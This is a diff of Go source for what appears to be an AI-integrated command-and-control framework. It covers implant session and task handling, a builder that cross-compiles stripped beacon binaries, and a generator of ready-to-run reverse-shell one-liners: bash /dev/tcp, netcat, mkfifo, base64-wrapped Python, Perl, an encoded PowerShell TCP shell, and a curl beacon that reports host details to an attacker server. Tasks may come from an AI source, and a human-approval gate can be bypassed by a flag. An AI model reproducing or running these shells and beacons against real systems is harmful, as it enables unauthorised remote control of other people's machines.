m.logger.Warn("恢复 C2 listener 失败:列表查询出错", zap.Error(err))
return
}
for _, l := range listeners {
if l.Status != "running" {
continue
}
if _, err := m.StartListener(l.ID); err != nil && !errors.Is(err, ErrListenerRunning) {
m.logger.Warn("恢复 C2 listener 失败", zap.String("listener_id", l.ID), zap.Error(err))
}
}
}
// ----------------------------------------------------------------------------
// Session 生命周期
// ----------------------------------------------------------------------------
// IngestCheckIn beacon 上线/心跳的统一入口。
// 行为:
// 1. 若 implant_uuid 已有会话 → 更新心跳/状态
// 2. 否则创建新会话,触发 OnSessionFirstSeen 钩子
func (m *Manager) IngestCheckIn(listenerID string, req ImplantCheckInRequest) (*database.C2Session, error) {
if strings.TrimSpace(req.ImplantUUID) == "" {
return nil, ErrInvalidInput
}
existing, err := m.db.GetC2SessionByImplantUUID(req.ImplantUUID)
if err != nil {
return nil, err
}
now := time.Now()
isFirstSeen := existing == nil
var sessID string
if existing != nil {
sessID = existing.ID
} else {
sessID = "s_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
}
session := &database.C2Session{
ID: sessID,
ListenerID: listenerID,
ImplantUUID: req.ImplantUUID,
Hostname: req.Hostname,
Username: req.Username,
OS: strings.ToLower(req.OS),
Arch: strings.ToLower(req.Arch),
PID: req.PID,
ProcessName: req.ProcessName,
IsAdmin: req.IsAdmin,
InternalIP: req.InternalIP,
UserAgent: req.UserAgent,
SleepSeconds: req.SleepSeconds,
JitterPercent: req.JitterPercent,
Status: string(SessionActive),
FirstSeenAt: now,
LastCheckIn: now,
Metadata: req.Metadata,
}
if existing != nil {
// 保留原 ID/FirstSeenAt/Note,避免被覆盖
session.FirstSeenAt = existing.FirstSeenAt
if session.Note == "" {
session.Note = existing.Note
}
}
if err := m.db.UpsertC2Session(session); err != nil {
return nil, err
}
if isFirstSeen {
m.publishEvent("critical", "session", session.ID, "",
fmt.Sprintf("新会话上线: %s@%s (%s/%s)", session.Username, session.Hostname, session.OS, session.Arch),
map[string]interface{}{
"session_id": session.ID,
"listener_id": listenerID,
"hostname": session.Hostname,
"os": session.OS,
"arch": session.Arch,
"internal_ip": session.InternalIP,
})
m.mu.RLock()
hook := m.hooks.OnSessionFirstSeen
m.mu.RUnlock()
if hook != nil {
go hook(session)
}
}
// 普通心跳:last_check_in 已由 UpsertC2Session 写入 c2_sessions,不再落 c2_events。
// 否则按 sleep 周期每条心跳一条审计,库表与 SSE 会被迅速撑爆;上线/掉线等仍照常 publishEvent。
return session, nil
}
// MarkSessionDead 心跳超时检测器调用:标记会话为 dead
func (m *Manager) MarkSessionDead(sessionID string) error {
if err := m.db.SetC2SessionStatus(sessionID, string(SessionDead)); err != nil {
return err
}
m.publishEvent("warn", "session", sessionID, "", "会话已离线(心跳超时)", nil)
return nil
}
// ----------------------------------------------------------------------------
// Task 生命周期
// ----------------------------------------------------------------------------
// EnqueueTaskInput 下发任务入参
type EnqueueTaskInput struct {
SessionID string
TaskType TaskType
Payload map[string]interface{}
Source string // manual|ai|batch|api
ConversationID string
UserCtx context.Context // 给 HITL 用
BypassHITL bool // true 表示跳过 HITL 审批(仅供白名单机制 / 系统内部用)
}
// EnqueueTask 入队一个新任务;若任务类型危险且未 BypassHITL,且 SetHITLDangerousGate 对当前会话与 MCPToolC2Task 返回 true,才会调 HITL 桥审批。
// 返回任务记录;任务派发由 PopTasksForBeacon 在 beacon 拉任务时完成。
func (m *Manager) EnqueueTask(in EnqueueTaskInput) (*database.C2Task, error) {
if strings.TrimSpace(in.SessionID) == "" {
return nil, ErrInvalidInput
}
session, err := m.db.GetC2Session(in.SessionID)
if err != nil {
return nil, err
}
if session == nil {
return nil, ErrSessionNotFound
}
if session.Status == string(SessionDead) || session.Status == string(SessionKilled) {
return nil, &CommonError{Code: "session_inactive", Message: "会话已离线,无法下发任务", HTTP: 409}
}
// OPSEC: command deny regex enforcement
if in.TaskType == TaskTypeExec || in.TaskType == TaskTypeShell {
cmd, _ := in.Payload["command"].(string)
if cmd != "" {
listenerCfg := m.getListenerConfig(session.ListenerID)
if listenerCfg != nil {
for _, pattern := range listenerCfg.CommandDenyRegex {
re, err := regexp.Compile(pattern)
if err != nil {
m.logger.Warn("invalid command_deny_regex", zap.String("pattern", pattern), zap.Error(err))
continue
}
if re.MatchString(cmd) {
return nil, &CommonError{
Code: "command_denied",
Message: fmt.Sprintf("命令被 OPSEC 规则拒绝 (匹配: %s)", pattern),
HTTP: 403,
}
}
}
}
}
}
// OPSEC: max_concurrent_tasks enforcement
listenerCfg := m.getListenerConfig(session.ListenerID)
if listenerCfg != nil && listenerCfg.MaxConcurrentTasks > 0 {
activeTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{
SessionID: in.SessionID,
Status: string(TaskQueued),
})
sentTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{
SessionID: in.SessionID,
Status: string(TaskSent),
})
concurrent := len(activeTasks) + len(sentTasks)
if concurrent >= listenerCfg.MaxConcurrentTasks {
return nil, &CommonError{
Code: "concurrent_limit",
Message: fmt.Sprintf("会话已有 %d 个排队/执行中的任务,超过并发上限 %d", concurrent, listenerCfg.MaxConcurrentTasks),
HTTP: 429,
}
}
}
taskID := "t_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
task := &database.C2Task{
ID: taskID,
SessionID: in.SessionID,
TaskType: string(in.TaskType),
Payload: in.Payload,
Status: string(TaskQueued),
Source: strOr(in.Source, "manual"),
ConversationID: in.ConversationID,
CreatedAt: time.Now(),
}
// HITL 检查:仅当注入的 gate 认为当前会话应对统一 MCP 工具 c2_task 做人机协同时才走桥(关闭人机协同时与其它工具一致,直接入队)。
if IsDangerousTaskType(in.TaskType) && !in.BypassHITL {
m.mu.RLock()
bridge := m.hitlBridge
gate := m.hitlDangerousGate
m.mu.RUnlock()
convID := strings.TrimSpace(in.ConversationID)
useBridge := bridge != nil && gate != nil && gate(convID, MCPToolC2Task)
if useBridge {
task.ApprovalStatus = "pending"
if err := m.db.CreateC2Task(task); err != nil {
return nil, err
}
m.publishEvent("warn", "task", in.SessionID, taskID, fmt.Sprintf("危险任务待审批: %s", in.TaskType), map[string]interface{}{
"task_id": taskID,
"task_type": in.TaskType,
})
payloadBytes, _ := json.Marshal(in.Payload)
ctx := HITLUserContext(in.UserCtx)
if ctx == nil {
ctx = context.Background()
}
go func() {
err := bridge.RequestApproval(ctx, HITLApprovalRequest{
TaskID: taskID,
SessionID: in.SessionID,
TaskType: string(in.TaskType),
PayloadJSON: string(payloadBytes),
ConversationID: in.ConversationID,
Source: task.Source,
Reason: fmt.Sprintf("C2 危险任务 %s", in.TaskType),
})
if err != nil {
rejected := "rejected"
failed := string(TaskFailed)
errMsg := "HITL 拒绝: " + err.Error()
_ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{
ApprovalStatus: &rejected,
Status: &failed,
Error: &errMsg,
})
m.publishEvent("warn", "task", in.SessionID, taskID, errMsg, nil)
return
}
approved := "approved"
_ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{ApprovalStatus: &approved})
m.publishEvent("info", "task", in.SessionID, taskID, "危险任务已批准", nil)
}()
return task, nil
}
// 未接桥或会话未开启人机协同 / 工具在白名单:直接入队
task.ApprovalStatus = "approved"
}
if err := m.db.CreateC2Task(task); err != nil {
return nil, err
}
m.publishEvent("info", "task", in.SessionID, taskID, fmt.Sprintf("任务已入队: %s", in.TaskType), map[string]interface{}{
"task_id": taskID,
"task_type": in.TaskType,
"source": task.Source,
})
return task, nil
}
// CancelTask 取消队列中的任务(已 sent/running 的暂不支持回滚)
func (m *Manager) CancelTask(taskID string) error {
t, err := m.db.GetC2Task(taskID)
if err != nil {
return err
}
if t == nil {
return ErrTaskNotFound
}
if t.Status != string(TaskQueued) && t.Status != string(TaskSent) {
return &CommonError{Code: "task_running", Message: "任务已在执行,无法取消", HTTP: 409}
}
cancelled := string(TaskCancelled)
now := time.Now()
if err := m.db.UpdateC2Task(taskID, database.C2TaskUpdate{Status: &cancelled, CompletedAt: &now}); err != nil {
return err
}
m.publishEvent("info", "task", t.SessionID, taskID, "任务已取消", nil)
return nil
}
// PopTasksForBeacon beacon check_in 后调用:取该会话所有 queued+approved 的任务,
// 内部已置为 sent;返回 TaskEnvelope,便于 listener 直接编码下发。
func (m *Manager) PopTasksForBeacon(sessionID string, limit int) ([]TaskEnvelope, error) {
tasks, err := m.db.PopQueuedC2Tasks(sessionID, limit)
if err != nil {
return nil, err
}
out := make([]TaskEnvelope, 0, len(tasks))
for _, t := range tasks {
out = append(out, TaskEnvelope{TaskID: t.ID, TaskType: t.TaskType, Payload: t.Payload})
}
return out, nil
}
// IngestTaskResult beacon 回传任务结果的统一入口
func (m *Manager) IngestTaskResult(report TaskResultReport) error {
if strings.TrimSpace(report.TaskID) == "" {
return ErrInvalidInput
}
t, err := m.db.GetC2Task(report.TaskID)
if err != nil {
return err
}
if t == nil {
return ErrTaskNotFound
}
startedAt := time.Unix(0, report.StartedAt*int64(time.Millisecond))
endedAt := time.Unix(0, report.EndedAt*int64(time.Millisecond))
if report.StartedAt == 0 {
startedAt = time.Now()
}
if report.EndedAt == 0 {
endedAt = time.Now()
}
status := string(TaskSuccess)
if !report.Success {
status = string(TaskFailed)
}
duration := endedAt.Sub(startedAt).Milliseconds()
upd := database.C2TaskUpdate{
Status: &status,
ResultText: &report.Output,
Error: &report.Error,
StartedAt: &startedAt,
CompletedAt: &endedAt,
DurationMS: &duration,
}
// blob(如截图)落盘
if len(report.BlobBase64) > 0 {
blobPath, err := m.saveResultBlob(t.ID, report.BlobBase64, report.BlobSuffix)
if err == nil {
upd.ResultBlobPath = &blobPath
} else {
m.logger.Warn("结果 blob 落盘失败", zap.Error(err), zap.String("task_id", t.ID))
}
}
if err := m.db.UpdateC2Task(t.ID, upd); err != nil {
return err
}
t.Status = status
t.ResultText = report.Output
t.Error = report.Error
level := "info"
msg := fmt.Sprintf("任务完成: %s", t.TaskType)
if !report.Success {
level = "warn"
msg = fmt.Sprintf("任务失败: %s (%s)", t.TaskType, report.Error)
}
m.publishEvent(level, "task", t.SessionID, t.ID, msg, map[string]interface{}{
"task_id": t.ID,
"task_type": t.TaskType,
"duration": duration,
})
m.mu.RLock()
hook := m.hooks.OnTaskCompleted
m.mu.RUnlock()
if hook != nil {
go hook(t, t.SessionID)
}
return nil
}
func (m *Manager) saveResultBlob(taskID, b64Content, suffix string) (string, error) {
suffix = strings.TrimSpace(suffix)
if suffix == "" {
suffix = ".bin"
}
if !strings.HasPrefix(suffix, ".") {
suffix = "." + suffix
}
dir := filepath.Join(m.storageDir, "results")
if err := osMkdirAll(dir, 0o755); err != nil {
return "", err
}
path := filepath.Join(dir, taskID+suffix)
data, err := base64Decode(b64Content)
if err != nil {
return "", err
}
if err := osWriteFile(path, data, 0o644); err != nil {
return "", err
}
return path, nil
}
// ----------------------------------------------------------------------------
// 事件总线辅助
// ----------------------------------------------------------------------------
// publishEvent 同步写 c2_events 表 + 投放到内存事件总线
func (m *Manager) publishEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) {
id := "e_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
now := time.Now()
e := &database.C2Event{
ID: id,
Level: level,
Category: category,
SessionID: sessionID,
TaskID: taskID,
Message: message,
Data: data,
CreatedAt: now,
}
if err := m.db.AppendC2Event(e); err != nil {
m.logger.Warn("写 C2 事件失败", zap.Error(err), zap.String("category", category))
}
m.bus.Publish(&Event{
ID: id,
Level: level,
Category: category,
SessionID: sessionID,
TaskID: taskID,
Message: message,
Data: data,
CreatedAt: now,
})
}
// PublishCustomEvent 给外部组件(HITL 桥 / handler)写自定义事件用
func (m *Manager) PublishCustomEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) {
m.publishEvent(level, category, sessionID, taskID, message, data)
}
// ----------------------------------------------------------------------------
// 工具函数
// ----------------------------------------------------------------------------
func strOr(s, def string) string {
if strings.TrimSpace(s) == "" {
return def
}
return s
}
// getListenerConfig loads and parses the listener's config JSON from DB.
func (m *Manager) getListenerConfig(listenerID string) *ListenerConfig {
listener, err := m.db.GetC2Listener(listenerID)
if err != nil || listener == nil {
return nil
}
cfg := &ListenerConfig{}
if listener.ConfigJSON != "" && listener.ConfigJSON != "{}" {
_ = json.Unmarshal([]byte(listener.ConfigJSON), cfg)
}
return cfg
}
// GetProfile loads a C2Profile from DB by ID.
func (m *Manager) GetProfile(profileID string) (*database.C2Profile, error) {
if strings.TrimSpace(profileID) == "" {
return nil, nil
}
return m.db.GetC2Profile(profileID)
}
+74
View File
@@ -0,0 +1,74 @@
package c2
import (
"io"
"net"
"net/http"
"path/filepath"
"strconv"
"strings"
"testing"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// 回归:StartListener 返回的 rec 被 handler 脱敏清空 ImplantToken 后,运行中的 HTTP listener 仍能鉴权。
func TestStartListener_ImplantTokenSurvivesHandlerRedaction(t *testing.T) {
tmp := t.TempDir()
db, err := database.NewDB(filepath.Join(tmp, "c2.sqlite"), zap.NewNop())
if err != nil {
t.Fatal(err)
}
t.Cleanup(func() { _ = db.Close() })
lnPick, err := net.Listen("tcp", "127.0.0.1:0")
if err != nil {
t.Fatal(err)
}
port := lnPick.Addr().(*net.TCPAddr).Port
_ = lnPick.Close()
mgr := NewManager(db, zap.NewNop(), tmp)
mgr.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener)
rec, err := mgr.CreateListener(CreateListenerInput{
Name: "t",
Type: string(ListenerTypeHTTPBeacon),
BindHost: "127.0.0.1",
BindPort: port,
})
if err != nil {
t.Fatal(err)
}
token := rec.ImplantToken
rec, err = mgr.StartListener(rec.ID)
if err != nil {
t.Fatal(err)
}
// 模拟 internal/handler/c2.go StartListener 在 JSON 响应前的脱敏
rec.ImplantToken = ""
rec.EncryptionKey = ""
time.Sleep(50 * time.Millisecond)
body := `{"hostname":"n","username":"u","os":"Linux","arch":"amd64","internal_ip":"10.0.0.1","pid":42}`
req, _ := http.NewRequest(http.MethodPost, "http://127.0.0.1:"+strconv.Itoa(port)+"/check_in", strings.NewReader(body))
req.Header.Set("X-Implant-Token", token)
req.Header.Set("Content-Type", "application/json")
resp, err := http.DefaultClient.Do(req)
if err != nil {
t.Fatal(err)
}
defer resp.Body.Close()
b, _ := io.ReadAll(resp.Body)
if resp.StatusCode != http.StatusOK {
t.Fatalf("status=%d body=%s", resp.StatusCode, b)
}
if !strings.Contains(string(b), "session_id") {
t.Fatalf("expected session_id in body: %s", b)
}
_ = mgr.StopListener(rec.ID)
}
+308
View File
@@ -0,0 +1,308 @@
package c2
import (
"encoding/json"
"fmt"
"net"
"os"
"strconv"
"os/exec"
"path/filepath"
"strings"
"text/template"
"github.com/google/uuid"
"go.uber.org/zap"
)
// PayloadBuilderInput 构建 beacon 的输入参数
type PayloadBuilderInput struct {
ListenerID string // l_xxx
OS string // linux|windows|darwin
Arch string // amd64|arm64|386
SleepSeconds int
JitterPercent int
OutputName string // custom output filename (without extension); defaults to "beacon_<os>_<arch>"
// Host 非空时作为植入端回连地址(覆盖监听器的 bind_host / 0.0.0.0 自动探测)
Host string
}
// PayloadBuilder 负责从模板生成并交叉编译 beacon 二进制
type PayloadBuilder struct {
manager *Manager
logger *zap.Logger
tmplDir string // 模板目录,如 internal/c2/payload_templates
outputDir string // 输出目录,如 tmp/c2/payloads
}
// NewPayloadBuilder 创建构建器
func NewPayloadBuilder(manager *Manager, logger *zap.Logger, tmplDir, outputDir string) *PayloadBuilder {
if tmplDir == "" {
tmplDir = "internal/c2/payload_templates"
}
if outputDir == "" {
outputDir = "tmp/c2/payloads"
}
return &PayloadBuilder{
manager: manager,
logger: logger,
tmplDir: tmplDir,
outputDir: outputDir,
}
}
// BuildResult 构建结果
type BuildResult struct {
PayloadID string `json:"payload_id"`
ListenerID string `json:"listener_id"`
OutputPath string `json:"output_path"`
DownloadPath string `json:"download_path"` // 磁盘上的绝对路径
OS string `json:"os"`
Arch string `json:"arch"`
SizeBytes int64 `json:"size_bytes"`
}
// BuildBeacon 交叉编译生成 beacon 二进制
func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, error) {
listener, err := b.manager.DB().GetC2Listener(in.ListenerID)
if err != nil {
return nil, fmt.Errorf("get listener: %w", err)
}
if listener == nil {
return nil, ErrListenerNotFound
}
lt := strings.ToLower(listener.Type)
cfg := &ListenerConfig{}
if listener.ConfigJSON != "" {
_ = parseJSON(listener.ConfigJSON, cfg)
}
cfg.ApplyDefaults()
// 确定目标架构
goos := strings.ToLower(in.OS)
goarch := strings.ToLower(in.Arch)
if goos == "" {
goos = "linux"
}
if goarch == "" {
goarch = "amd64"
}
// 读取模板
tmplPath := filepath.Join(b.tmplDir, "beacon.go.tmpl")
tmplData, err := os.ReadFile(tmplPath)
if err != nil {
return nil, fmt.Errorf("read template: %w", err)
}
// 模板参数:请求 Host > 监听器 callback_host > bind 推导(见 ResolveBeaconDialHost
host := ResolveBeaconDialHost(listener, in.Host, b.logger, listener.ID)
serverURL := fmt.Sprintf("%s://%s:%d",
listenerTypeToScheme(listener.Type),
host,
listener.BindPort,
)
transport := "http"
tcpDialAddr := ""
transportMeta := "http_beacon"
switch lt {
case "tcp_reverse":
transport = "tcp"
tcpDialAddr = net.JoinHostPort(host, strconv.Itoa(listener.BindPort))
transportMeta = "tcp_beacon"
case "https_beacon":
transportMeta = "https_beacon"
case "websocket":
transportMeta = "websocket"
}
data := map[string]string{
"Transport": transport,
"TCPDialAddr": tcpDialAddr,
"TransportMetadata": transportMeta,
"ServerURL": serverURL,
"ImplantToken": listener.ImplantToken,
"AESKeyB64": listener.EncryptionKey,
"SleepSeconds": fmt.Sprintf("%d", firstPositive(in.SleepSeconds, cfg.DefaultSleep, 5)),
"JitterPercent": fmt.Sprintf("%d", clamp(in.JitterPercent, 0, 100)),
"CheckInPath": cfg.BeaconCheckInPath,
"TasksPath": cfg.BeaconTasksPath,
"ResultPath": cfg.BeaconResultPath,
"UploadPath": cfg.BeaconUploadPath,
"FilePath": cfg.BeaconFilePath,
"UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
}
// 执行模板
tmpl, err := template.New("beacon").Parse(string(tmplData))
if err != nil {
return nil, fmt.Errorf("parse template: %w", err)
}
// 创建工作目录
workDir := filepath.Join(b.outputDir, "build-"+uuid.New().String()[:8])
if err := os.MkdirAll(workDir, 0755); err != nil {
return nil, fmt.Errorf("mkdir: %w", err)
}
defer os.RemoveAll(workDir) // 清理
srcPath := filepath.Join(workDir, "main.go")
f, err := os.Create(srcPath)
if err != nil {
return nil, fmt.Errorf("create source: %w", err)
}
if err := tmpl.Execute(f, data); err != nil {
f.Close()
return nil, fmt.Errorf("execute template: %w", err)
}
f.Close()
// 交叉编译
binName := strings.TrimSpace(in.OutputName)
if binName == "" {
binName = fmt.Sprintf("beacon_%s_%s", goos, goarch)
}
if goos == "windows" && !strings.HasSuffix(binName, ".exe") {
binName += ".exe"
}
binPath := filepath.Join(b.outputDir, binName)
if err := os.MkdirAll(b.outputDir, 0755); err != nil {
return nil, fmt.Errorf("mkdir output: %w", err)
}
absSrcPath, err := filepath.Abs(srcPath)
if err != nil {
return nil, fmt.Errorf("abs source path: %w", err)
}
absBinPath, err := filepath.Abs(binPath)
if err != nil {
return nil, fmt.Errorf("abs output path: %w", err)
}
cmd := exec.Command("go", "build", "-ldflags", "-s -w -buildid=", "-trimpath", "-o", absBinPath, absSrcPath)
cmd.Env = append(os.Environ(),
"GOOS="+goos,
"GOARCH="+goarch,
"CGO_ENABLED=0",
)
cmd.Dir = workDir
output, err := cmd.CombinedOutput()
if err != nil {
b.logger.Error("beacon build failed", zap.String("output", string(output)), zap.Error(err))
return nil, fmt.Errorf("build failed: %w (output: %s)", err, string(output))
}
// 获取文件大小
info, err := os.Stat(binPath)
if err != nil {
return nil, fmt.Errorf("stat output: %w", err)
}
payloadID := "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
return &BuildResult{
PayloadID: payloadID,
ListenerID: listener.ID,
OutputPath: absBinPath,
DownloadPath: absBinPath,
OS: goos,
Arch: goarch,
SizeBytes: info.Size(),
}, nil
}
func listenerTypeToScheme(t string) string {
switch strings.ToLower(t) {
case "https_beacon":
return "https"
case "websocket":
return "ws"
case "http_beacon":
return "http"
default:
return "http"
}
}
func firstPositive(vals ...int) int {
for _, v := range vals {
if v > 0 {
return v
}
}
return 1
}
func clamp(v, min, max int) int {
if v < min {
return min
}
if v > max {
return max
}
return v
}
// GetPayloadStoragePath 返回 payload 存储目录的绝对路径
func (b *PayloadBuilder) GetPayloadStoragePath() string {
abs, _ := filepath.Abs(b.outputDir)
return abs
}
// GetSupportedOSArch 返回支持的操作系统和架构列表
func GetSupportedOSArch() map[string][]string {
return map[string][]string{
"linux": {"amd64", "arm64", "386", "arm"},
"windows": {"amd64", "arm64", "386"},
"darwin": {"amd64", "arm64"},
}
}
// ValidateOSArch 验证 OS/Arch 组合是否可编译
func ValidateOSArch(os, arch string) bool {
supported := GetSupportedOSArch()
arches, ok := supported[strings.ToLower(os)]
if !ok {
return false
}
for _, a := range arches {
if a == strings.ToLower(arch) {
return true
}
}
return false
}
// detectExternalIP returns the first non-loopback IPv4 address, or "" if none found.
func detectExternalIP() string {
ifaces, err := net.Interfaces()
if err != nil {
return ""
}
for _, iface := range ifaces {
if iface.Flags&net.FlagLoopback != 0 || iface.Flags&net.FlagUp == 0 {
continue
}
addrs, err := iface.Addrs()
if err != nil {
continue
}
for _, addr := range addrs {
ipnet, ok := addr.(*net.IPNet)
if !ok || ipnet.IP.To4() == nil {
continue
}
return ipnet.IP.String()
}
}
return ""
}
func parseJSON(s string, v interface{}) error {
if strings.TrimSpace(s) == "" || s == "{}" {
return nil
}
return json.Unmarshal([]byte(s), v)
}
+25
View File
@@ -0,0 +1,25 @@
package c2
import (
"encoding/base64"
"encoding/binary"
)
// b64StdEncode 用标准 base64 编码字节
func b64StdEncode(s string) string {
return base64.StdEncoding.EncodeToString([]byte(s))
}
// utf16LEBase64 把字符串转 UTF-16LE 后再 base64,用于 PowerShell -EncodedCommand
// Windows PowerShell 接受这种格式,避免命令行特殊字符引起转义错误)
func utf16LEBase64(s string) string {
runes := []rune(s)
buf := make([]byte, 0, len(runes)*2)
for _, r := range runes {
// 注意:>0xFFFF 的字符需要代理对,但 PowerShell 命令通常都在 BMP 内
var enc [2]byte
binary.LittleEndian.PutUint16(enc[:], uint16(r))
buf = append(buf, enc[:]...)
}
return base64.StdEncoding.EncodeToString(buf)
}
+190
View File
@@ -0,0 +1,190 @@
package c2
import (
"fmt"
"net/url"
"strings"
)
// OnelinerKind 单行 payload 的语言/形式
type OnelinerKind string
const (
OnelinerBash OnelinerKind = "bash" // bash 反弹(TCP reverse listener
OnelinerNc OnelinerKind = "nc" // netcat 反弹
OnelinerNcMkfifo OnelinerKind = "nc_mkfifo" // 通过 mkfifo 双向(部分 nc 不支持 -e)
OnelinerPython OnelinerKind = "python" // python socket 反弹
OnelinerPerl OnelinerKind = "perl" // perl 反弹
OnelinerPowerShell OnelinerKind = "powershell" // PowerShell TCP 反弹(IEX 风格)
OnelinerCurl OnelinerKind = "curl_beacon" // 用 curl 周期性轮询 HTTP beacon(无需二进制)
)
// AllOnelinerKinds 所有支持的 oneliner 类型
func AllOnelinerKinds() []OnelinerKind {
return []OnelinerKind{
OnelinerBash, OnelinerNc, OnelinerNcMkfifo,
OnelinerPython, OnelinerPerl,
OnelinerPowerShell, OnelinerCurl,
}
}
// tcpOnelinerKinds 仅支持 tcp_reverse 监听器的裸 TCP 反弹类型
var tcpOnelinerKinds = map[OnelinerKind]bool{
OnelinerBash: true,
OnelinerNc: true,
OnelinerNcMkfifo: true,
OnelinerPython: true,
OnelinerPerl: true,
OnelinerPowerShell: true,
}
// httpOnelinerKinds 支持 http_beacon / https_beacon 监听器的类型
var httpOnelinerKinds = map[OnelinerKind]bool{
OnelinerCurl: true,
}
// OnelinerKindsForListener 根据监听器类型返回兼容的 oneliner 类型列表
func OnelinerKindsForListener(listenerType string) []OnelinerKind {
switch ListenerType(listenerType) {
case ListenerTypeTCPReverse:
return []OnelinerKind{
OnelinerBash, OnelinerNc, OnelinerNcMkfifo,
OnelinerPython, OnelinerPerl, OnelinerPowerShell,
}
case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket:
return []OnelinerKind{OnelinerCurl}
default:
return nil
}
}
// IsOnelinerCompatible 检查 oneliner 类型是否与监听器类型兼容
func IsOnelinerCompatible(listenerType string, kind OnelinerKind) bool {
switch ListenerType(listenerType) {
case ListenerTypeTCPReverse:
return tcpOnelinerKinds[kind]
case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket:
return httpOnelinerKinds[kind]
default:
return false
}
}
// OnelinerInput 生成 oneliner 的入参
type OnelinerInput struct {
Kind OnelinerKind
Host string // 攻击机回连地址(IP/域名)
Port int // 监听端口
HTTPBaseURL string // HTTPS Beacon 时使用,如 https://x.com
ImplantToken string // HTTP Beacon 鉴权 token
}
// GenerateOneliner 生成单行 payload。
// 设计要点:
// - 不依赖目标机预装的可执行(除该 oneliner 关键的 bash/python/perl 等);
// - 不引入引号嵌套陷阱:使用 base64/url 编码避免 shell 转义错误;
// - 同时返回执行示例,便于 AI 在对话里直接展示给操作员。
func GenerateOneliner(in OnelinerInput) (string, error) {
host := strings.TrimSpace(in.Host)
if host == "" {
return "", fmt.Errorf("host is required")
}
switch in.Kind {
case OnelinerBash:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
// 用 bash -c 包裹,确保在 zsh/sh 等非 bash shell 中也能正确执行
// /dev/tcp 是 bash 特有的伪设备,必须由 bash 进程解释
return fmt.Sprintf(`bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'`, host, in.Port), nil
case OnelinerNc:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
return fmt.Sprintf(`nc -e /bin/sh %s %d`, host, in.Port), nil
case OnelinerNcMkfifo:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
// 双向 mkfifo 写法,对没有 -e 的 nc/openbsd-nc 也能用
return fmt.Sprintf(
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f`,
host, in.Port,
), nil
case OnelinerPython:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
// python -c 单引号包裹,内部用三引号或转义会引发兼容性问题,改用 base64 解码再 exec
py := fmt.Sprintf(
`import socket,os,pty;s=socket.socket();s.connect(("%s",%d));[os.dup2(s.fileno(),x) for x in (0,1,2)];pty.spawn("/bin/sh")`,
host, in.Port,
)
// 用 b64 包装规避目标 shell 引号问题
return fmt.Sprintf(
`python3 -c "import base64,sys;exec(base64.b64decode('%s').decode())"`,
b64StdEncode(py),
), nil
case OnelinerPerl:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
return fmt.Sprintf(
`perl -e 'use Socket;$i="%s";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`,
host, in.Port,
), nil
case OnelinerPowerShell:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
// PowerShell TCP 反弹(不依赖 .NET old 版本)
ps := fmt.Sprintf(
`$c=New-Object System.Net.Sockets.TcpClient('%s',%d);$s=$c.GetStream();[byte[]]$b=0..65535|%%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$o2=$o+'PS '+(pwd).Path+'> ';$by=([text.encoding]::ASCII).GetBytes($o2);$s.Write($by,0,$by.Length);$s.Flush()};$c.Close()`,
host, in.Port,
)
return fmt.Sprintf(
`powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand %s`,
utf16LEBase64(ps),
), nil
case OnelinerCurl:
if strings.TrimSpace(in.HTTPBaseURL) == "" {
return "", fmt.Errorf("http_base_url is required for curl_beacon")
}
if strings.TrimSpace(in.ImplantToken) == "" {
return "", fmt.Errorf("implant_token is required for curl_beacon")
}
base := strings.TrimRight(in.HTTPBaseURL, "/")
return fmt.Sprintf(
`bash -c 'H="X-Implant-Token: %s";`+
`URL="%s";`+
`HN=$(hostname 2>/dev/null||echo unknown);`+
`UN=$(whoami 2>/dev/null||echo unknown);`+
`OS=$(uname -s 2>/dev/null||echo unknown);`+
`AR=$(uname -m 2>/dev/null||echo unknown);`+
`IP=$(hostname -I 2>/dev/null|awk "{print \$1}"||echo "");`+
`SID="";`+
`while :;do `+
`BODY="{\"hostname\":\"$HN\",\"username\":\"$UN\",\"os\":\"$OS\",\"arch\":\"$AR\",\"internal_ip\":\"$IP\",\"pid\":$$}";`+
`R=$(curl -fsSk -H "$H" -H "Content-Type: application/json" -X POST "$URL/check_in" -d "$BODY" 2>/dev/null);`+
`if [ -n "$R" ]&&[ -z "$SID" ];then SID=$(echo "$R"|grep -o "\"session_id\":\"[^\"]*\""|head -1|cut -d"\"" -f4);fi;`+
`if [ -n "$SID" ];then `+
`T=$(curl -fsSk -H "$H" -G "$URL/tasks?session_id=$SID" 2>/dev/null);`+
`fi;`+
`sleep 5;`+
`done' &`,
in.ImplantToken, base,
), nil
}
return "", fmt.Errorf("unsupported oneliner kind: %s", in.Kind)
}
// urlEncodeForShell URL 编码字符串,避免特殊字符在 shell 中破坏转义
func urlEncodeForShell(s string) string {
return url.QueryEscape(s)
}
File diff suppressed because it is too large Load Diff
+109
View File
